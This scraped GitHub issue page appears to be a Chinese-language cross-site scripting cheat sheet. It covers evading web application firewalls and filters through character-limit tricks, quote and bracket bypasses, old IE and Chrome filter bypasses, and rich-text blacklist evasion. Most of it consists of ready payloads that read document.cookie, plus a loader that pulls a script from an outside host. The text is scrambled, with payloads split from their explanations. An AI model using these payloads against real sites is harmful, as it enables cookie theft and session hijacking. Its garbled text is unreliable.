We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Satisfaction doesn't come from the outside, but from the inside.
WAF
XSS
HTML
JS
eval、document.write、innerHTML
<div id="x"> 可控的安全数据 </div> <limited_xss_point>alert(1);</limited_xss_point>
Payload
escape
<div id="x">alert%28document.cookie%29%3b</div> // escape编码 <limited_xss_point>eval(unescape(x.innerHTML));</limited_xss_point>
28 + len(id)
document.URL
<p>
<p class="comment" title=""><script>/*" data-comment='{"id":1}'></p> <p class="comment" title="*/x=new Array();/*" data-comment='{"id":1}'></p> <p class="comment" title="*/x[0]='a';/*" data-comment='{"id":1}'></p> <p class="comment" title="*/x[1]='l';/*" data-comment='{"id":1}'></p> <p class="comment" title="*/x[2]='e';/*" data-comment='{"id":1}'></p> <p class="comment" title="*/x[3]='r';/*" data-comment='{"id":1}'></p> <p class="comment" title="*/x[4]='t';/*" data-comment='{"id":1}'></p> <p class="comment" title="*/x[5]='(';/*" data-comment='{"id":1}'></p> <p class="comment" title="*/x[6]='1';/*" data-comment='{"id":1}'></p> <p class="comment" title="*/x[7]=')';/*" data-comment='{"id":1}'></p> <p class="comment" title="*/y=x.join('');/*" data-comment='{"id":1}'></p> <p class="comment" title="*/eval(y);/*" data-comment='{"id":1}'></p> <p class="comment" title="*/</script>" data-comment='{"id":1}'></p>
URL
document.URL/location.href
http://www.xxx.com/1.php?x=1...&alert(document.cookie) // 假设代码从第80个字符开始 <limited_xss_point>eval(document.URL.substr(80));</limited_xss_point>
30
<limited_xss_point>eval(location.href.substr(80));</limited_xss_point>
31
<limited_xss_point>eval(document.URL.slice(80));</limited_xss_point>
29
<limited_xss_point>eval(location.href.slice(80));</limited_xss_point>
location
hash
#
http://www.xxx.com/1.php?x=1...#alert(document.cookie) <limited_xss_point>eval(location.hash.slice(1));</limited_xss_point>
1
function loads(url){ ... document.body.appendChild(script); }
<limited_xss_point>loads('http://xxx.com/x');</limited_xss_point>
len(函数名)+len(url)+5
HTTP
function get(url){ ... return x.response Text; }
<limited_xss_point>eval(get('http://xxx.com/x'));</limited_xss_point>
len(函数名)+len(url)+11
document.referrer
referrer
http://www.a.com/attack.html?...&alert(document.cookie) <a href="http://www.xssedsite.com/xssed.php">go</a>
<limited_xss_point>eval(document.referrer.slice(80));</limited_xss_point>
clipboardData
<script> clipboardData.setData("text", "alert(document.cookie)"); </script>
<limited_xss_point>eval(clipboardData.getData("text"));</limited_xss_point>
IE 7
window.name
name
<script> window.name = "alert(document.cookie)"; location.href = "http://www.xssedsitecom/xssedphp"; </script>
<limited_xss_point>eval(name);</limited_xss_point>
11
/
<script>alert(/1/)</script> <iframe/onload=alert(/1/)> <img src=x onerror=alert(/1/)> <p onmouseover=alert(/1/)>xxx</p>
String.fromCharCode
fromCharCode
eval
<script>alert('1')</alert> <script>eval(String.fromCharCode(97,108,101,114,116,40,39,49,39,41))</script>
onerror
onmouseover
onload
<、>、=
script
<img src=x onerror=alert(/1/)> <p onmouseover=alert(/1/)>xxx</p> <frameset onload=alert(/1/)> <body onload=alert(/1/)>
style
expression
IE
<div style="width:expression(alert('1'));">
JavaScript
<img src=javascript:alert('1')>
Cookie
src
.js
<script src='1.js'></script>
hex
dec
<div style="width:expression(alert('1'))">1</div> <div style="width:expression(alert('1'))">1</div>
Filter
反射型XSS
IE Filter
<a href=>
a
sc%0aript
href
<a href="xss.php?a=<sc%0aript>alert(/1/)</script>">
utf7
UTF7-BOM
header
utf-7
%2BACIAPgA8-script%2BAD4-alert%28/1/%29%2BADw-%2Fscript%2BAD4APAAi-&oe=Windows-31J
Flash
www.b.com
iframe
www.a.com
Flash XSS
<iframe/src="http://www.b.com/1.swf?get-data=(function(){location.href=%22javascript:'<script>alert(document.cookie)</script>'%22})()"></iframe>
Chrome
<iframe/src="http://www.b.com/1.swf?get-data=(function(){alert(document.cookie)})()"></iframe>
Chrome Filter
data
?vuln=<a href="javascript:alert(document.cookie);">click</a> // 拦截 >vuln=<a href="javascript:void(0)">click</a> // 绕过 ?vuln=<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgnMScpPC9zY3JpcHQ+ ">click<a> // 绕过
object
applet
base
link
meta
import
embed
vmlframe
isindex
form
textarea
javascript:
vbscript:
on*
<ifra<ifame>me>...</ifra</iframe>me> <s<script>cript>...</s</script>cript>
<div style="width:expression(alert(/1/))">1</div> <div style="width:\0065xpression(alert(/1/))">1</div> // 编码 <div style="width:\0065xpressio\6e(alert(/1/))">1</div> <div style="width:\0065xpression(alert(/1/))">1</div>
tab
换行
空白符
/**
<div style="width:exp/** **/ression(alert(/1/))">1</div>
date
base64
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgvaW5zaWdodC1sYWJzLyk8L3NjcmlwdD4=">
HTML5
button
video
audio
article
footer
nav
automplete
autofocus
pattern
<input onfocus=write(1) autofocus> <video poster=javascript:alert(1)//></video>
<!--[if IE]><img src=# width=0 height=0 onerror=alert(/ourren_demo/)><![endif]--> <comment><img src="</comment><img src=x onerror=alert(/ourren_demo/)//">
The text was updated successfully, but these errors were encountered:
No branches or pull requests
0x01 XSS
WAF
绕过XSS
字符数量限制绕过XSS
漏洞由于字符数量限制导致没法有效利用,所以需要绕过限制HTML
上下文中其他可控数据XSS
漏洞的页面HTML
上下文中还有其他可控数据,那么可以通过JS
获取该数据,然后通过eval、document.write、innerHTML
等方式执行该数据,从而突破XSS
字符数量限制XSS
处字符数量的限制,所以只能弹框,无法有效利用,这里通过把XSS
的Payload
通过escape
编码后作为安全的数据,输出到可控的安全数据位置(此处未限制),然后在XSS
处执行可控的安全数据28 + len(id)
document.URL
等方式,但是可控无限个<p>
,可以分割单独插入URL
中的数据HTML
上下文,可以使用URL
,URL
中的数据是无条件可控的,通过在URL
的尾部参数构造要执行的代码,然后在XSS
处通过document.URL/location.href
等方式获得代码数据执行30
31
29
30
location
对象 中hash
成员可以获取#
之后的数据#
开头,所以从1
开始,长度:29
JS
上下文JS
上下文现有的这些函数来实现突破长度限制len(函数名)+len(url)+5
HTTP
请求len(函数名)+len(url)+11
document.referrer
XSS
的页面,在自己域上的页面URL
带入Payload
,被XSS
的页面通过referrer
获取相关代码执行referrer
参数,当攻击者的页面访问的时候,就会有referrer
参数,即攻击者的URL
XSS
的页面clipboardData
clipboardData
把Payload
写入剪切板,然后在被XSS
的页面获取并执行该数据XSS
的页面IE 7
以下window.name
window.name
直接设置当前窗口的name
则没有特殊字符限制,然后直接跳转到被XSS
的页面,通过name
属性传递Payload
过去执行XSS
的页面11
XSS
引号绕过/
进行绕过String.fromCharCode
fromCharCode
可以对利用代码中的引号进行编码处理,需要利用eval
函数结合使用XSS
尖括号绕过onerror
、onmouseover
、onload
等(但是这里依然需要有<、>、=
等符号,只能是在script
才过滤)style
与expression
style
样式进行跨站(IE
)JavaScript
伪协议IE
XSS
括号绕过Cookie
等,还需要传播(XSS
蠕虫)src
引入外部文件,利用代码写在外部文件中(外部文件后缀可以不为.js
)hex
、dec
编码XSS
绕过过滤器(Filter
)反射型XSS
,其他类型基本不受影响IE Filter
绕过<a href=>
反射型XSS
,可以利用a
标签和sc%0aript
实现绕过,不过需要用户点击href
里面的地址不同域就会产生过滤utf7
UTF7-BOM
实现,全补丁情况下只有当header
里编码为utf-7
才能成功Flash
www.b.com
域名下用iframe
嵌入www.a.com
的Flash XSS
文件,当受害者打开www.b.com
,就可以触发www.a.com
域名下的XSS
,获取数据a
而言,这个Flash XSS
只是普通的Flash XSS
,只不过是由跨域的浏览器发起的Chrome
下可能会导致浏览器崩溃,改用以下代码Chrome Filter
data
协议XSS
富文本绕过object
applet
base
link
meta
import
embed
vmlframe
iframe
script
style
isindex
form
textarea
javascript:
vbscript:
onload
onerror
on*
expression
只能IE
执行,因此仅限于IE
tab
、换行
、空白符
、/**
绕过关键字匹配,基本也只限于IE
object
标签,将date
属性数据进行base64
编码绕过关键数据,同时object
标签也是经常被遗忘的标签HTML5
HTML5
新标签或者新属性来进行绕过button
video
audio
article
footer
nav
automplete
autofocus
pattern
...IE
的注释方式The text was updated successfully, but these errors were encountered: